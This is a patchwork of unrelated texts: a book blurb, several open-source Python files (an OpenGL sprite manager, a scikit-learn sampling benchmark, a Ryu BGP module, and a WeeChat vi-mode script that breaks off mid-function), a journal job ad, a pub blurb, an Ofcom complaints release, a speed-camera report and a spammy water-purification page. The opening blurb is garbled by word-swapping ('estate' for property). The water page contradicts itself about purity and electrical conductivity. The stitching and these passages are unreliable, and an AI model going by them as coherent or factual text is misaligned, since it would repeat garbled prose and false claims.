" His examine of robust collective intentionality -- as expressed by way of joint intentions, collective dedication, team trust, authority-based staff motion, and different phenomena -- outlines the situations lower than which someone is needed to imagine and act as a gaggle member. This selection of essays by way of one of many country's prime estate theorists revitalizes the liberal character thought of estate. Departing from conventional libertarian and financial theories of estate, Margaret Jane Radin argues that the legislations may still keep in mind nonmonetary own worth connected to property—and that a few issues, reminiscent of physically integrity, are so own they need to no longer be thought of estate in any respect.
""" The MIT License (MIT) Copyright (c) 2015 Guillermo Romero Franco (AKA Gato) Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
""" from glcompat import * from profiler import profile import numpy as N import math import libs.transformations as T from gltools import * #from OpenGL.arrays import vbo from libs.sortedcontainers.sortedlist import SortedList _floats_per_vertex = 6 class SpriteTexture: def __init__(self, surface_size): self._surface = pygame.Surface((surface_size,surface_size), flags=pygame.SRCALPHA) self._texture = Texture(smoothing=True) self._texture.setFromSurface(self._surface) self._vbo_change_low = 1000000 self._vbo_change_high = 0 self.reset() def getSurface(self): return self._surface # note vbo_index is the GLOBAL TILE NUMBER # that is, not numbered within the texture def setTainted(self, img = False, vbo_index=None): if img: self._img_tainted = True if vbo_index is not None: self._vbo_change_low = min(self._vbo_change_low, vbo_index) self._vbo_change_high = max(self._vbo_change_high, vbo_index+1) def reset(self): self._img_tainted = False self._vbo_change_low = 1000000 self._vbo_change_high = 0 def isImageTainted(self): return self._img_tainted def isVboTainted(self): t = self._vbo_change_high > self._vbo_change_low return t def updateGlTexture(self): if self._img_tainted: self._texture.update(self._surface) self._img_tainted = False def bind(self, loc): return self._texture.bind(0,loc) class SpriteManager: def __init__(self, tile_size=64): self._tile_size = tile_size self._texture_size = 1024 self._max_textures = 5 self._tile_rows_in_texture = self._texture_size / tile_size self._free_tiles = SortedList() self._textures = [] self._total_tiles = 0 self._sprites = {} self._top_sprite_id = 0 self._total_tiles_per_texture = int(self._tile_rows_in_texture**2) self._vbo_index_bytes_per_texture = self._total_tiles_per_texture * 6 * _floats_per_vertex * ctypes.sizeof(ctypes.c_uint16) self._max_tiles = self._total_tiles_per_texture *self._max_textures self.initBuffers() def initBuffers(self): self._vao = glGenVertexArray() glBindVertexArray(self._vao) self._shader = 
R.getShaderProgram("sprites") self._texture_loc = self._shader.getUniformPos("texture0") # 1 vectors of 3 for vertex coords # 1 vector of 2 for texture coords # 1 float for alpha # = 6 floats = _floats_per_vertex # x 4 points per quad self._data = N.zeros((self._max_tiles * 4, _floats_per_vertex),dtype="f") # 6 indices (2 tris) per quad indices = N.empty((self._max_tiles,6), dtype=N.uint16) j = 0 for i in xrange(self._max_tiles): ind = indices[i,:] ind[0] = j+0 ind[1] = j+1 ind[2] = j+2 ind[3] = j+0 ind[4] = j+2 ind[5] = j+3 j+=4; self._vertices_vbo = vbo.VBO(self._data.ravel(),usage=GL_DYNAMIC_DRAW) self._vertices_vbo.bind() stride = fsize * _floats_per_vertex glEnableVertexAttribArray(self._shader.attr_position) glVertexAttribPointer(self._shader.attr_position, 3, GL_FLOAT, False, stride, None) glEnableVertexAttribArray(self._shader.attr_tc) glVertexAttribPointer(self._shader.attr_tc, 2, GL_FLOAT, False, stride, ctypes.c_void_p(3 * fsize)) self._shader.getAttribPos("alpha",True) glEnableVertexAttribArray(self._shader.attr_alpha) glVertexAttribPointer(self._shader.attr_alpha, 1, GL_FLOAT, False, stride, ctypes.c_void_p(5*fsize)) self._indices_vbo = vbo.VBO(indices.ravel(), target=GL_ELEMENT_ARRAY_BUFFER,usage=GL_STATIC_DRAW) self._indices_vbo.bind() glBindVertexArray(0) # creates a new texture and pushes all new tiles # into the _free_tiles list def newTexture(self): texture_surface_id = len(self._textures) texture = SpriteTexture(self._texture_size) self._textures.append(texture) #[texture_surf, texture,False,0,0]) ty = 0 for y in xrange(self._tile_rows_in_texture): tx = 0 for x in xrange(self._tile_rows_in_texture): # #cols = #rows self._free_tiles.add((texture_surface_id, (ty,tx), self._total_tiles)) tx += self._tile_size self._total_tiles += 1 ty += self._tile_size def getFreeTile(self): try: tile = self._free_tiles.pop(0) except: self.newTexture() # create more tiles tile = self._free_tiles.pop(0) return tile def setTileAlpha(self, tile, alpha): 
texture_surf_id, tile_pos, tile_num = tile d = self._data[4*tile_num:4*tile_num+4] d[0:4,5] = alpha self._textures[texture_surf_id].setTainted(vbo_index=tile_num) def setTileGraphics(self, tile, src_tile_coord, surf, alpha): texture_surf_id, (ty,tx), tile_num = tile src_x = src_tile_coord[0] * self._tile_size src_y = src_tile_coord[1] * self._tile_size ts = self._tile_size # blit texture onto it tex = self._textures[texture_surf_id] texture_surf = tex.getSurface()# texture surface texture_surf.fill((0,0,0,0), rect=(tx,ty,ts,ts) ) texture_surf.blit(surf, (tx,ty), area=(src_x,src_y,ts,ts)) # setup the vbo data u0 = float(tx) / self._texture_size u1 = float(tx+ts) / self._texture_size v0 = 1.0-float(ty) / self._texture_size v1 = 1.0-float(ty+ts) / self._texture_size d = self._data[4*tile_num:4*tile_num+4] d[0][3:6] = (u0,v0, alpha) d[1][3:6] = (u0,v1, alpha) d[2][3:6] = (u1,v1, alpha) d[3][3:6] = (u1,v0, alpha) tex.setTainted(img=True, vbo_index=tile_num) def setTileTransform(self, tile, src_tile_coord, transform_info): texture_surf_id, tile_pos, tile_num = tile dx,dy,p0,px,py = transform_info x0 = dx * src_tile_coord[0] y0 = dy * src_tile_coord[1] d = self._data[4*tile_num:4*tile_num+4] vx = px - p0 vy = py - p0 p0 = p0 + vx*x0 + vy*y0 d[0][0:3] = p0 d[1][0:3] = p0 + vy * dy d[2][0:3] = p0 + vx * dx + vy * dy d[3][0:3] = p0 + vx * dx self._textures[texture_surf_id].setTainted(vbo_index=tile_num) def getTransformInfo(self, surf_w, surf_h, xform,centered): ts = self._tile_size tiles_w = int(math.ceil(float(surf_w)/ts)) tiles_h = int(math.ceil(float(surf_h)/ts)) p0 = N.array((0,0,0),dtype="f") px = N.array((surf_w,0,0),dtype="f") py = N.array((0,surf_h,0),dtype="f") if centered is not None: dp = N.array((surf_w*0.5,surf_h*0.5,0),dtype="f") p0 -= dp px -= dp py -= dp if xform is not None: xr = xform[0:3,0:3] xt = xform[0:3,3] p0 = N.dot(xr,p0)+xt px = N.dot(xr,px)+xt py = N.dot(xr,py)+xt dx = 1.0/tiles_w dy = 1.0/tiles_h return dx,dy,p0,px,py def _newSpriteHlp(self, 
surface, alpha, xform=None, centered=None): try: surface.get_width() except: surface = R.loadSurface(surface) ts = self._tile_size w,h = surface.get_width(), surface.get_height() tiles_x = int(math.ceil(float(w)/ts)) tiles_y = int(math.ceil(float(h)/ts)) transform_info = self.getTransformInfo(w,h,xform,centered) sprite_tiles = [] for y in xrange(tiles_y): for x in xrange(tiles_x): tile = self.getFreeTile() self.setTileGraphics(tile, (x,y), surface, alpha ) self.setTileTransform(tile, (x,y), transform_info ) sprite_tiles.append(tile) return (sprite_tiles,(w,h),alpha,xform,centered) def newSprite(self, surface, alpha=1.0, xform=None, centered=None): try: surface.get_width() except: surface = R.loadSurface(surface,False) s = self._newSpriteHlp(surface, alpha, xform, centered) id = self._top_sprite_id self._sprites[id] = s self._top_sprite_id+=1 return id def destroySprite(self, sid): try: s = self._sprites[sid] except: return for tile in s[0]: # iterate over the tiles in the sprite self.setTileAlpha(tile, 0) # this disables the rendering of the sprite self._free_tiles.add(tile) del self._sprites[sid] def setSpriteAlpha(self, sid, alpha): try: s = self._sprites[sid] except: return if s[2] == alpha: return for tile in s[0]: # iterate over the tiles in the sprite self.setTileAlpha(tile, alpha) def setSpriteTransform(self, sid, xform, centered=None): try: s = self._sprites[sid] except: return tiles,(w,h),alpha,old_xform,old_centered = s if centered is None: centered = old_centered transform_info = self.getTransformInfo(w,h,xform,centered) ts = self._tile_size tiles_x = int(math.ceil(float(w)/ts)) tiles_y = int(math.ceil(float(h)/ts)) i = 0 for y in xrange(tiles_y): for x in xrange(tiles_x): self.setTileTransform(tiles[i], (x,y), transform_info ) i+=1 def setSpriteGraphics(self, sid, surface): try: s = self._sprites[sid] except: return sprite_tiles,(w,h),alpha,xform,centered = s for tile in sprite_tiles: # iterate over the tiles in the sprite self._free_tiles.add(tile) 
self.setTileAlpha(tile, 0) # this disables the rendering of the sprite s = self._newSpriteHlp(surface, alpha, xform, centered) self._sprites[sid] = s @profile def draw(self, scene): glEnable(GL_BLEND) glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA) glDisable(GL_DEPTH_TEST) self._shader.begin() scene.uploadMatrices(self._shader) glBindVertexArray(self._vao) ofs = 0 self._indices_vbo.bind() for t in self._textures: t.updateGlTexture() if t.isVboTainted(): fac = _floats_per_vertex * 4 * fsize # bytes/quad self._vertices_vbo.bind() glBufferSubData( GL_ARRAY_BUFFER, fac * t._vbo_change_low, fac * (t._vbo_change_high - t._vbo_change_low), self._data[t._vbo_change_low*4:].ravel().ctypes.data_as(ctypes.c_void_p) ) self._indices_vbo.bind() t.bind(self._texture_loc) glDrawElements(GL_TRIANGLES,self._total_tiles_per_texture*6, GL_UNSIGNED_SHORT, ctypes.c_void_p(ofs)) ofs += self._vbo_index_bytes_per_texture t.reset() glBindVertexArray(0) self._shader.end() glEnable(GL_DEPTH_TEST) glDisable(GL_BLEND)
Additionally, the Editorial Assistant / Copy Editor will attend Editorial Team Conference Calls to discuss the progress of the publication, suggest ideas for improvement, technology, and other innovations. Additional duties may be assigned as required. Familiarity with the peer-review editorial process of journals and strong writing skills for academic publications, with some APA writing style experience. Evidence of graduate training or professional development, with some expertise and knowledge in the context of positive health and well-being. Any experience serving as an active contributor to an academic/professional publication or publication outlet is a plus. Applicant should be familiar with the first edition of Chronicle of Advances in Positive Health and Well-Being, available at: http://www.ippanetwork.org/divisions/healthdivision/health-and-wellness-publication-1/ The second publication will be issued in the late winter / spring of 2019. The Editorial Assistant / Copy Editor should be able to make a time commitment of 2-4 hours a week for the approximately 3 month working period before the release of the second edition. Time requirements may increase in the weeks leading up to the publication deadline. To talk with someone about this available role, please email healthdiv@ippanetwork.org. Reviewers are needed for Commentaries (submitted commentaries on emerging topics of interest to positive psychology, or of commentaries on articles already published in the positive psychology literature) and for Clinical / Practice (submissions related to clinical practice or training). The editorial team is preparing for the second issue of the Chronicle of Advances in Positive Health and Well-being to be released in the late winter / spring of 2019. Commentaries Reviewer: Interested individuals should have experience and awareness of the positive psychology general literature and curiosity about what might be new or intriguing in the field. 
Clinical / Practice Reviewer: Interested individuals must have clinical and/or practitioner experience (hands-on patient or client experience is helpful; for example, MDs, DOs, PAs, NPs, and nurses are invited) relevant to positive psychology. Publications in peer-reviewed journals using APA publication format are a plus.
""" Benchmarks for sampling without replacement of integer. """ from __future__ import division from __future__ import print_function import gc import sys import optparse from datetime import datetime import operator import matplotlib.pyplot as plt import numpy as np import random from sklearn.externals.six.moves import xrange from sklearn.utils.random import sample_without_replacement def compute_time(t_start, delta): mu_second = 0.0 + 10 ** 6 # number of microseconds in a second return delta.seconds + delta.microseconds / mu_second def bench_sample(sampling, n_population, n_samples): gc.collect() # start time t_start = datetime.now() sampling(n_population, n_samples) delta = (datetime.now() - t_start) # stop time time = compute_time(t_start, delta) return time if __name__ == "__main__": ########################################################################### # Option parser ########################################################################### op = optparse.OptionParser() op.add_option("--n-times", dest="n_times", default=5, type=int, help="Benchmark results are average over n_times experiments") op.add_option("--n-population", dest="n_population", default=100000, type=int, help="Size of the population to sample from.") op.add_option("--n-step", dest="n_steps", default=5, type=int, help="Number of step interval between 0 and n_population.") default_algorithms = "custom-tracking-selection,custom-auto," \ "custom-reservoir-sampling,custom-pool,"\ "python-core-sample,numpy-permutation" op.add_option("--algorithm", dest="selected_algorithm", default=default_algorithms, type=str, help="Comma-separated list of transformer to benchmark. " "Default: %default. 
\nAvailable: %default") # op.add_option("--random-seed", # dest="random_seed", default=13, type=int, # help="Seed used by the random number generators.") (opts, args) = op.parse_args() if len(args) > 0: op.error("this script takes no arguments.") sys.exit(1) selected_algorithm = opts.selected_algorithm.split(',') for key in selected_algorithm: if key not in default_algorithms.split(','): raise ValueError("Unknown sampling algorithm \"%s\" not in (%s)." % (key, default_algorithms)) ########################################################################### # List sampling algorithm ########################################################################### # We assume that sampling algorithm has the following signature: # sample(n_population, n_sample) # sampling_algorithm = {} ########################################################################### # Set Python core input sampling_algorithm["python-core-sample"] = \ lambda n_population, n_sample: \ random.sample(xrange(n_population), n_sample) ########################################################################### # Set custom automatic method selection sampling_algorithm["custom-auto"] = \ lambda n_population, n_samples, random_state=None: \ sample_without_replacement(n_population, n_samples, method="auto", random_state=random_state) ########################################################################### # Set custom tracking based method sampling_algorithm["custom-tracking-selection"] = \ lambda n_population, n_samples, random_state=None: \ sample_without_replacement(n_population, n_samples, method="tracking_selection", random_state=random_state) ########################################################################### # Set custom reservoir based method sampling_algorithm["custom-reservoir-sampling"] = \ lambda n_population, n_samples, random_state=None: \ sample_without_replacement(n_population, n_samples, method="reservoir_sampling", random_state=random_state) 
########################################################################### # Set custom reservoir based method sampling_algorithm["custom-pool"] = \ lambda n_population, n_samples, random_state=None: \ sample_without_replacement(n_population, n_samples, method="pool", random_state=random_state) ########################################################################### # Numpy permutation based sampling_algorithm["numpy-permutation"] = \ lambda n_population, n_sample: \ np.random.permutation(n_population)[:n_sample] ########################################################################### # Remove unspecified algorithm sampling_algorithm = dict((key, value) for key, value in sampling_algorithm.items() if key in selected_algorithm) ########################################################################### # Perform benchmark ########################################################################### time = {} n_samples = np.linspace(start=0, stop=opts.n_population, num=opts.n_steps).astype(np.int) ratio = n_samples / opts.n_population print('Benchmarks') print("===========================") for name in sorted(sampling_algorithm): print("Perform benchmarks for %s..." 
% name, end="") time[name] = np.zeros(shape=(opts.n_steps, opts.n_times)) for step in xrange(opts.n_steps): for it in xrange(opts.n_times): time[name][step, it] = bench_sample(sampling_algorithm[name], opts.n_population, n_samples[step]) print("done") print("Averaging results...", end="") for name in sampling_algorithm: time[name] = np.mean(time[name], axis=1) print("done\n") # Print results ########################################################################### print("Script arguments") print("===========================") arguments = vars(opts) print("%s \t | %s " % ("Arguments".ljust(16), "Value".center(12),)) print(25 * "-" + ("|" + "-" * 14) * 1) for key, value in arguments.items(): print("%s \t | %s " % (str(key).ljust(16), str(value).strip().center(12))) print("") print("Sampling algorithm performance:") print("===============================") print("Results are averaged over %s repetition(s)." % opts.n_times) print("") fig = plt.figure('scikit-learn sample w/o replacement benchmark results') plt.title("n_population = %s, n_times = %s" % (opts.n_population, opts.n_times)) ax = fig.add_subplot(111) for name in sampling_algorithm: ax.plot(ratio, time[name], label=name) ax.set_xlabel('ratio of n_sample / n_population') ax.set_ylabel('Time (s)') ax.legend() # Sort legend labels handles, labels = ax.get_legend_handles_labels() hl = sorted(zip(handles, labels), key=operator.itemgetter(1)) handles2, labels2 = zip(*hl) ax.legend(handles2, labels2, loc=0) plt.show()
The Bell is a 15th-century inn located in Whitchurch, Hampshire, with a welcoming atmosphere. For the 7th year running, Jan and Paul are proud to announce that the Bell pub has been included yet again in the 2015 CAMRA Good Beer Guide! We've got a good selection of real ales on tap, from Gales Seafarers Ale and Sharp's Doom Bar to London Pride.
import os from sys import modules from shutil import copytree def copy_examples(dest_path='.'): """Copy mfoutparser example files to a specified directory. Input: destination path for mfoutparser example files, default directory is the current path. If the destination directory exists and is not empty, then a directory called "examples" will be created for the files inside the destination directory. Output: directory with example files """ # Setup examples path mfoutpath = modules['mfoutparser'].__path__[0] examplespath = os.sep.join([mfoutpath, 'examples']) # Setup destination path if dest_path is '.': dest_path = os.getcwd() elif dest_path[0] is not os.sep: dest_path = os.sep.join([os.getcwd(), dest_path]) destination = dest_path # Create a new destination directory if current one is not empty if os.path.exists(destination): if os.listdir(destination) != []: destination = os.sep.join([destination, 'examples']) # Copy files try: copytree(examplespath, destination) except: print('Files could not be copied to {:s}'.format(destination)) else: print('Example files copied to {:s}'.format(destination)) return
Note: The landline results in this press release were adjusted on 15 December 2017, and the associated reports have been amended accordingly. Ofcom today published data on the volume of consumer complaints it has received against the major providers of telecoms and pay-TV services. The latest report covers the three-month period from October to December 2016 (Q4), and includes complaints made about providers of landline telephone, home broadband, pay-monthly mobile and pay-TV services. Complaints figures are presented per 100,000 customers. By publishing complaints data, Ofcom aims to give people who are looking for a new provider useful information for comparing companies' performance. The quarterly reports also offer an incentive to providers to improve their performance. The total number of complaints made to Ofcom increased between Q3 2016 and Q4 2016. Broadband and landline telephone services generated the highest volume of complaints. Lindsey Fussell, Ofcom's Consumer Group Director, said: “Providers must get on and deliver consistently excellent customer service, and we expect this to be their number one priority.”
""" This module provides a set of utilities for writing TSV files. .. autoclass:: mysqltsv.writer.Writer :members: .. autofunction:: mysqltsv.functions.write """ import logging from .util import write_row logger = logging.getLogger(__name__) class Writer: """ Constructs a new TSV row writer. :Parameters: f : `file` A file pointer to write rows to headers : `list`(`str`) If a list of `str` is provided, use those strings as headers. Otherwise, no headers are written. none_string : `str` A string that will be written as None when read. (Defaults to "NULL") """ def __init__(self, f, headers=None, none_string="NULL"): self.f = f self.none_string = none_string if headers != None: write_row(headers, self.f, none_string=self.none_string) self.headers = headers def write(self, row): """ Writes a row to the output file. :Parameters: row : `list` | `dict` | :class:`~mysqltsv.row_type.AbstractRow` Datastructure representing the row to write """ write_row(row, self.f, headers=self.headers, none_string=self.none_string)
Figures released by ITS (UK) member Transport Scotland show that almost every single driver on a 51-mile (80 km) stretch of the A90 travelled within the speed limit in 2018. The road is enforced by fellow ITS (UK) member Jenoptik’s average speed cameras, which monitor the journey time between locations and flag up drivers who complete sections of the journey in a time that would only be possible if they were speeding. The figures show that in the 12 months of operation, 5,942 drivers were caught breaking the limit and were issued with a fine and penalty points; however, this was out of an estimated 8.4 million journeys in each direction, meaning that Conditional Offers of Fixed Penalty Notices made up just 0.07% of journeys.
# Copyright (C) 2014 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """ Defines data types and models required specifically for VPNv4 support. """ import logging from ryu.lib.packet.bgp import IPAddrPrefix from ryu.lib.packet.bgp import RF_IPv4_VPN from ryu.services.protocols.bgp.info_base.vpn import VpnDest from ryu.services.protocols.bgp.info_base.vpn import VpnPath from ryu.services.protocols.bgp.info_base.vpn import VpnTable LOG = logging.getLogger('bgpspeaker.info_base.vpnv4') class Vpnv4Dest(VpnDest): """VPNv4 Destination Store IPv4 Paths. """ ROUTE_FAMILY = RF_IPv4_VPN class Vpnv4Table(VpnTable): """Global table to store VPNv4 routing information. Uses `Vpnv4Dest` to store destination information for each known vpnv4 paths. """ ROUTE_FAMILY = RF_IPv4_VPN VPN_DEST_CLASS = Vpnv4Dest class Vpnv4Path(VpnPath): """Represents a way of reaching an VPNv4 destination.""" ROUTE_FAMILY = RF_IPv4_VPN VRF_PATH_CLASS = None # defined in init - anti cyclic import hack NLRI_CLASS = IPAddrPrefix def __init__(self, *args, **kwargs): super(Vpnv4Path, self).__init__(*args, **kwargs) from ryu.services.protocols.bgp.info_base.vrf4 import Vrf4Path self.VRF_PATH_CLASS = Vrf4Path
Compare Deionized Water. Huge Spring Sales Now On! Hopping Mad Deals Ending Soon, Take Advantage Now! You can compare deionized water with distilled water, but to say that distilled water is the same as deionized water is a mistake. The terms “distilled water” and “deionized water” are often misunderstood. Deionization involves removing dissolved ions from water (typically by passing it through ion-exchange resins), whereas distillation simply involves the evaporation and re-condensation of water. Deionized Water vs. Distilled Water: Summary. Distilled water is water that has been evaporated through boiling and then re-condensed in a separate container. Depending on the source water, distilled water can be more pure than deionized water – but that doesn't necessarily mean that it's better. There are pros and cons to using deionized water vs. distilled water for particular processes, particularly when it comes to cost and efficiency. Which water should you use in your cosmetic lab? When we take all factors into account, distilled water has the highest quality for a cosmetic lab, but distilled water is not always achievable and affordable. As an alternative, you can use deionized or RO water in your cosmetic lab. Best practice is to use freshly boiled water in your cosmetic lab. Distilled water is the most common kind of purified water and may often be confused with deionized water, but the two are certainly different. Distilled water and deionized water are both fit to drink, but deionized water is more pure. Distilled water conducts electricity whereas deionized water does not.
# -*- coding: utf-8 -*- # # Copyright (C) 2013-2014 Germain Z. <germanosz@gmail.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # # Add vi/vim-like modes to WeeChat. # import csv import os import re import subprocess from StringIO import StringIO import time import weechat # Script info. # ============ SCRIPT_NAME = "vimode" SCRIPT_AUTHOR = "GermainZ <germanosz@gmail.com>" SCRIPT_VERSION = "0.5" SCRIPT_LICENSE = "GPL3" SCRIPT_DESC = ("Add vi/vim-like modes and keybindings to WeeChat.") # Global variables. # ================= # General. # -------- # Halp! Halp! Halp! GITHUB_BASE = "https://github.com/GermainZ/weechat-vimode/blob/master/" README_URL = GITHUB_BASE + "README.md" FAQ_KEYBINDINGS = GITHUB_BASE + "FAQ#problematic-key-bindings.md" FAQ_ESC = GITHUB_BASE + "FAQ.md#esc-key-not-being-detected-instantly" # Holds the text of the command-line mode (currently only Ex commands ":"). cmd_text = "" # Mode we're in. One of INSERT, NORMAL or REPLACE. mode = "INSERT" # Holds normal commands (e.g. "dd"). vi_buffer = "" # See `cb_key_combo_default()`. esc_pressed = 0 # See `cb_key_pressed()`. last_signal_time = 0 # See `start_catching_keys()` for more info. catching_keys_data = {'amount': 0} # Used for ; and , to store the last f/F/t/T motion. last_search_motion = {'motion': None, 'data': None} # Script options. 
# Option name -> (default value, description), registered with WeeChat.
# NOTE(review): the implicit string concatenation below yields
# "...problematickeybindings..." -- a space appears to be missing between the
# two literals. It is a runtime string, so it is left untouched in this
# documentation-only pass.
vimode_settings = {'no_warn': ("off", "don't warn about problematic"
                               "keybindings and tmux/screen")}


# Regex patterns.
# ---------------
WHITESPACE = re.compile(r"\s")
IS_KEYWORD = re.compile(r"[a-zA-Z0-9_@À-ÿ]")
REGEX_MOTION_LOWERCASE_W = re.compile(r"\b\S|(?<=\s)\S")
REGEX_MOTION_UPPERCASE_W = re.compile(r"(?<=\s)\S")
REGEX_MOTION_UPPERCASE_E = re.compile(r"\S(?!\S)")
REGEX_MOTION_UPPERCASE_B = REGEX_MOTION_UPPERCASE_E
REGEX_MOTION_G_UPPERCASE_E = REGEX_MOTION_UPPERCASE_W
REGEX_MOTION_CARRET = re.compile(r"\S")
# Plain pattern string (not compiled): passed to get_pos() as-is.
REGEX_INT = r"[0-9]"

# Regex used to detect problematic keybindings.
# For example: meta-wmeta-s is bound by default to ``/window swap``.
# If the user pressed Esc-w, WeeChat will detect it as meta-w and will not
# send any signal to `cb_key_combo_default()` just yet, since it's the
# beginning of a known key combo.
# Instead, `cb_key_combo_default()` will receive the Esc-ws signal, which
# becomes "ws" after removing the Esc part, and won't know how to handle it.
REGEX_PROBLEMATIC_KEYBINDINGS = re.compile(r"meta-\w(meta|ctrl)")


# Vi commands.
# ------------
# See Also: `cb_exec_cmd()`.
VI_COMMANDS = {'h': "/help",
               'qall': "/exit",
               'q': "/close",
               'w': "/save",
               'set': "/set",
               'bp': "/buffer -1",
               'bn': "/buffer +1",
               'bd': "/close",
               'b#': "/input jump_last_buffer_displayed",
               'b': "/buffer",
               'sp': "/window splith",
               'vsp': "/window splitv"}

# Vi operators.
# -------------
# Each operator must have a corresponding function, called "operator_X" where
# X is the operator. For example: `operator_c()`.
VI_OPERATORS = ["c", "d", "y"]

# Vi motions.
# -----------
# Vi motions. Each motion must have a corresponding function, called
# "motion_X" where X is the motion (e.g. `motion_w()`).
# See Also: `SPECIAL_CHARS`.
VI_MOTIONS = ["w", "e", "b", "^", "$", "h", "l", "W", "E", "B", "f", "F", "t",
              "T", "ge", "gE", "0"]

# Special characters for motions. The corresponding function's name is
# converted before calling. For example, "^" will call `motion_carret` instead
# of `motion_^` (which isn't allowed because of illegal characters).
SPECIAL_CHARS = {'^': "carret",
                 '$': "dollar"}


# Methods for vi operators, motions and key bindings.
# ===================================================

# Documented base examples:
# -------------------------

def operator_base(buf, input_line, pos1, pos2, overwrite):
    """Operator method example.

    Args:
        buf (str): pointer to the current WeeChat buffer.
        input_line (str): the content of the input line.
        pos1 (int): the starting position of the motion.
        pos2 (int): the ending position of the motion.
        overwrite (bool, optional): whether the character at the cursor's new
            position should be overwritten or not (for inclusive motions).
            Defaults to False.

    Notes:
        Should be called "operator_X", where X is the operator, and defined
        in `VI_OPERATORS`.
        Must perform actions (e.g. modifying the input line) on its own,
        using the WeeChat API.

    See Also:
        For additional examples, see `operator_d()` and `operator_y()`.
    """
    # Get start and end positions.
    start = min(pos1, pos2)
    end = max(pos1, pos2)
    # Print the text the operator should go over.
    weechat.prnt("", "Selection: %s" % input_line[start:end])

def motion_base(input_line, cur, count):
    """Motion method example.

    Args:
        input_line (str): the content of the input line.
        cur (int): the position of the cursor.
        count (int): the amount of times to multiply or iterate the action.

    Returns:
        A tuple containing three values:
            int: the new position of the cursor.
            bool: True if the motion is inclusive, False otherwise.
            bool: True if the motion is catching, False otherwise.
                See `start_catching_keys()` for more info on catching motions.

    Notes:
        Should be called "motion_X", where X is the motion, and defined in
        `VI_MOTIONS`.
        Must not modify the input line directly.

    See Also:
        For additional examples, see `motion_w()` (normal motion) and
        `motion_f()` (catching motion).
    """
    # Find (relative to cur) position of next number.
    pos = get_pos(input_line, REGEX_INT, cur, True, count)
    # Return the new (absolute) cursor position.
    # This motion is exclusive, so overwrite is False.
    # NOTE(review): the docstring above documents a 3-tuple (and the real
    # motions return one), but this example returns only two values --
    # left as-is in this documentation-only pass.
    return cur + pos, False

def key_base(buf, input_line, cur, count):
    """Key method example.

    Args:
        buf (str): pointer to the current WeeChat buffer.
        input_line (str): the content of the input line.
        cur (int): the position of the cursor.
        count (int): the amount of times to multiply or iterate the action.

    Notes:
        Should be called `key_X`, where X represents the key(s), and defined
        in `VI_KEYS`.
        Must perform actions on its own (using the WeeChat API).

    See Also:
        For additional examples, see `key_a()` (normal key) and
        `key_r()` (catching key).
    """
    # Key was pressed. Go to Insert mode (similar to "i").
    set_mode("INSERT")


# Operators:
# ----------

def operator_d(buf, input_line, pos1, pos2, overwrite=False):
    """Delete text from `pos1` to `pos2` from the input line.

    If `overwrite` is set to True, the character at the cursor's new position
    is removed as well (the motion is inclusive).

    See Also:
        `operator_base()`.
    """
    start = min(pos1, pos2)
    end = max(pos1, pos2)
    if overwrite:
        end += 1
    input_line = list(input_line)
    del input_line[start:end]
    input_line = "".join(input_line)
    weechat.buffer_set(buf, "input", input_line)
    set_cur(buf, input_line, pos1)

def operator_c(buf, input_line, pos1, pos2, overwrite=False):
    """Delete text from `pos1` to `pos2` from the input and enter Insert
    mode.

    If `overwrite` is set to True, the character at the cursor's new position
    is removed as well (the motion is inclusive.)

    See Also:
        `operator_base()`.
    """
    operator_d(buf, input_line, pos1, pos2, overwrite)
    set_mode("INSERT")

def operator_y(buf, input_line, pos1, pos2, _):
    """Yank text from `pos1` to `pos2` from the input line.

    The selection is copied to the X clipboard via the external `xclip`
    utility.

    See Also:
        `operator_base()`.
    """
    start = min(pos1, pos2)
    end = max(pos1, pos2)
    proc = subprocess.Popen(["xclip", "-selection", "c"],
                            stdin=subprocess.PIPE)
    proc.communicate(input=input_line[start:end])


# Motions:
# --------

def motion_0(input_line, cur, count):
    """Go to the first character of the line.

    See Also:
        `motion_base()`.
    """
    return 0, False, False

def motion_w(input_line, cur, count):
    """Go `count` words forward and return position.

    See Also:
        `motion_base()`.
    """
    pos = get_pos(input_line, REGEX_MOTION_LOWERCASE_W, cur, True, count)
    if pos == -1:
        return len(input_line), False, False
    return cur + pos, False, False

def motion_W(input_line, cur, count):
    """Go `count` WORDS forward and return position.

    See Also:
        `motion_base()`.
    """
    pos = get_pos(input_line, REGEX_MOTION_UPPERCASE_W, cur, True, count)
    if pos == -1:
        return len(input_line), False, False
    return cur + pos, False, False

def motion_e(input_line, cur, count):
    """Go to the end of `count` words and return position.

    See Also:
        `motion_base()`.
    """
    for _ in range(max(1, count)):
        found = False
        pos = cur
        for pos in range(cur + 1, len(input_line) - 1):
            # Whitespace, keep going.
            if WHITESPACE.match(input_line[pos]):
                pass
            # End of sequence made from 'iskeyword' characters only,
            # or end of sequence made from non 'iskeyword' characters only.
            elif ((IS_KEYWORD.match(input_line[pos]) and
